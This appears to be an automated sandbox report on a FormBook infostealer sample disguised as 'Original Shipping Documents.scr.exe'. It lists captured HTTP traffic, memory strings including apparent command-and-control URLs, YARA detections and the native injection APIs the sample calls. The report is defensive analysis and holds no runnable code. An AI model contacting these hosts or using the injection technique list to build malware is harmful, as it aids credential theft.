6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 25 Apr 2025 14:08:29 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: SecEdit.exe, 00000010.00000002.3851116276.00000000036D4000.00000004.10000000.00040000.00000000.sdmp, xBk0IlKjg.exe, 00000011.00000002.3850351956.0000000003194000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2055916137.0000000003EA4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://Hindi.fit/50pk/?NV0x=UatWUPwGe7DsxKy0VpyPjoZZeqT3/D
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1455329912.0000000003041000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: xHOAJKcJeCXuc.exe, 00000009.00000002.1656092706.0000000003001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameP
Source: Original Shipping Documents.scr.exe, xHOAJKcJeCXuc.exe.0.dr	String found in binary or memory: http://tempuri.org/Book_Mgt_System_01DataSet.xsd
Source: Original Shipping Documents.scr.exe, xHOAJKcJeCXuc.exe.0.dr	String found in binary or memory: http://tempuri.org/Student_Management_System_02DataSet.xsdIBook_Mgt_System.Properties.Resources
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: xBk0IlKjg.exe, 00000011.00000002.3852328512.0000000005237000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.fix.shopping
Source: xBk0IlKjg.exe, 00000011.00000002.3852328512.0000000005237000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.fix.shopping/39bh/
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: SecEdit.exe, 00000010.00000002.3853415681.0000000007798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: SecEdit.exe, 00000010.00000002.3853415681.0000000007798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SecEdit.exe, 00000010.00000002.3853415681.0000000007798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: SecEdit.exe, 00000010.00000002.3853415681.0000000007798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SecEdit.exe, 00000010.00000002.3853415681.0000000007798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: SecEdit.exe, 00000010.00000002.3853415681.0000000007798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SecEdit.exe, 00000010.00000002.3853415681.0000000007798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: SecEdit.exe, 00000010.00000002.3853415681.0000000007798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: SecEdit.exe, 00000010.00000002.3849651901.0000000002A51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: SecEdit.exe, 00000010.00000002.3849651901.0000000002A51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033R
Source: SecEdit.exe, 00000010.00000002.3849651901.0000000002A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: SecEdit.exe, 00000010.00000003.1927649800.000000000776A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: SecEdit.exe, 00000010.00000002.3853415681.0000000007798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: SecEdit.exe, 00000010.00000002.3853415681.0000000007798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 8.2.Original Shipping Documents.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Original Shipping Documents.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1742172690.0000000001960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3848860460.0000000000190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3849067022.0000000000630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3852328512.00000000051E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3849139713.0000000000680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1741455772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3850140955.00000000032D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1744390860.0000000002930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Original Shipping Documents.scr.exe

Contains functionality to call native functions

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_0042C9E3 NtClose,	8_2_0042C9E3
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82B60 NtClose,LdrInitializeThunk,	8_2_01A82B60
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82DF0 NtQuerySystemInformation,LdrInitializeThunk,	8_2_01A82DF0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82C70 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_01A82C70
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A835C0 NtCreateMutant,LdrInitializeThunk,	8_2_01A835C0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A84340 NtSetContextThread,	8_2_01A84340
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A84650 NtSuspendThread,	8_2_01A84650
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82BA0 NtEnumerateValueKey,	8_2_01A82BA0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82B80 NtQueryInformationFile,	8_2_01A82B80
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82BE0 NtQueryValueKey,	8_2_01A82BE0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82BF0 NtAllocateVirtualMemory,	8_2_01A82BF0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82AB0 NtWaitForSingleObject,	8_2_01A82AB0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82AF0 NtWriteFile,	8_2_01A82AF0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82AD0 NtReadFile,	8_2_01A82AD0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82DB0 NtEnumerateKey,	8_2_01A82DB0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82DD0 NtDelayExecution,	8_2_01A82DD0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82D30 NtUnmapViewOfSection,	8_2_01A82D30
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82D00 NtSetInformationFile,	8_2_01A82D00
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82D10 NtMapViewOfSection,	8_2_01A82D10
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82CA0 NtQueryInformationToken,	8_2_01A82CA0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82CF0 NtOpenProcess,	8_2_01A82CF0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82CC0 NtQueryVirtualMemory,	8_2_01A82CC0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82C00 NtQueryInformationProcess,	8_2_01A82C00
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82C60 NtCreateKey,	8_2_01A82C60
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82FA0 NtQuerySection,	8_2_01A82FA0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82FB0 NtResumeThread,	8_2_01A82FB0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82F90 NtProtectVirtualMemory,	8_2_01A82F90
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82FE0 NtCreateFile,	8_2_01A82FE0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82F30 NtCreateSection,	8_2_01A82F30
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82F60 NtCreateProcessEx,	8_2_01A82F60
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82EA0 NtAdjustPrivilegesToken,	8_2_01A82EA0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82E80 NtReadVirtualMemory,	8_2_01A82E80
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82EE0 NtQueueApcThread,	8_2_01A82EE0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82E30 NtWriteVirtualMemory,	8_2_01A82E30
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A83090 NtSetValueKey,	8_2_01A83090
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A83010 NtOpenDirectoryObject,	8_2_01A83010
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A839B0 NtGetContextThread,	8_2_01A839B0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A83D10 NtOpenProcessToken,	8_2_01A83D10
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A83D70 NtOpenThread,	8_2_01A83D70

Detected potential crypto function

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 0_2_05473E28	0_2_05473E28
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 0_2_0547F1A4	0_2_0547F1A4
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 0_2_05477018	0_2_05477018
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 0_2_05586F98	0_2_05586F98
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 0_2_05580218	0_2_05580218
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 0_2_05580228	0_2_05580228
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 0_2_05586F61	0_2_05586F61
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 0_2_075E5EB0	0_2_075E5EB0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 0_2_075EF458	0_2_075EF458
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 0_2_075EF456	0_2_075EF456
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 0_2_075EF020	0_2_075EF020
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 0_2_075EEBE8	0_2_075EEBE8
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 0_2_075EEBB8	0_2_075EEBB8
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 0_2_075EF890	0_2_075EF890
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_004188D3	8_2_004188D3
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_0041011A	8_2_0041011A
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_00410123	8_2_00410123
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_00403190	8_2_00403190
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_00401230	8_2_00401230
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_00416AD0	8_2_00416AD0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_00416AD3	8_2_00416AD3
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_00410343	8_2_00410343
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_0040E333	8_2_0040E333
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_0040E478	8_2_0040E478
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_0040E483	8_2_0040E483
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_004026A1	8_2_004026A1
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_004026B0	8_2_004026B0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_0042EFF3	8_2_0042EFF3
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B101AA	8_2_01B101AA
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B081CC	8_2_01B081CC
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A40100	8_2_01A40100
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEA118	8_2_01AEA118
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AD8158	8_2_01AD8158
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AE2000	8_2_01AE2000
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A5E3F0	8_2_01A5E3F0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B103E6	8_2_01B103E6
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B0A352	8_2_01B0A352
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AD02C0	8_2_01AD02C0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AF0274	8_2_01AF0274
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B10591	8_2_01B10591
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A50535	8_2_01A50535
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AFE4F6	8_2_01AFE4F6
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AF4420	8_2_01AF4420
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B02446	8_2_01B02446
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4C7C0	8_2_01A4C7C0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A50770	8_2_01A50770
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A74750	8_2_01A74750
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A6C6E0	8_2_01A6C6E0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A529A0	8_2_01A529A0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B1A9A6	8_2_01B1A9A6
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A66962	8_2_01A66962
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A368B8	8_2_01A368B8
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7E8F0	8_2_01A7E8F0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A52840	8_2_01A52840
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A5A840	8_2_01A5A840
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B06BD7	8_2_01B06BD7
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B0AB40	8_2_01B0AB40
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4EA80	8_2_01A4EA80
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A68DBF	8_2_01A68DBF
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4ADE0	8_2_01A4ADE0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A5AD00	8_2_01A5AD00
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AECD1F	8_2_01AECD1F
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AF0CB5	8_2_01AF0CB5
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A40CF2	8_2_01A40CF2
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A50C00	8_2_01A50C00
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01ACEFA0	8_2_01ACEFA0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A5CFE0	8_2_01A5CFE0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A42FC8	8_2_01A42FC8
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A92F28	8_2_01A92F28
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A70F30	8_2_01A70F30
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AF2F30	8_2_01AF2F30
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC4F40	8_2_01AC4F40
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B0CE93	8_2_01B0CE93
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A62E90	8_2_01A62E90
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B0EEDB	8_2_01B0EEDB
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B0EE26	8_2_01B0EE26
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A50E59	8_2_01A50E59
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A5B1B0	8_2_01A5B1B0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A8516C	8_2_01A8516C
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A3F172	8_2_01A3F172
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B1B16B	8_2_01B1B16B
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B0F0E0	8_2_01B0F0E0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B070E9	8_2_01B070E9
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AFF0CC	8_2_01AFF0CC
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A570C0	8_2_01A570C0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A9739A	8_2_01A9739A
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B0132D	8_2_01B0132D
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A3D34C	8_2_01A3D34C
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A552A0	8_2_01A552A0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AF12ED	8_2_01AF12ED
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A6B2C0	8_2_01A6B2C0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AED5B0	8_2_01AED5B0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B07571	8_2_01B07571
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B0F43F	8_2_01B0F43F
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A41460	8_2_01A41460
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B0F7B0	8_2_01B0F7B0
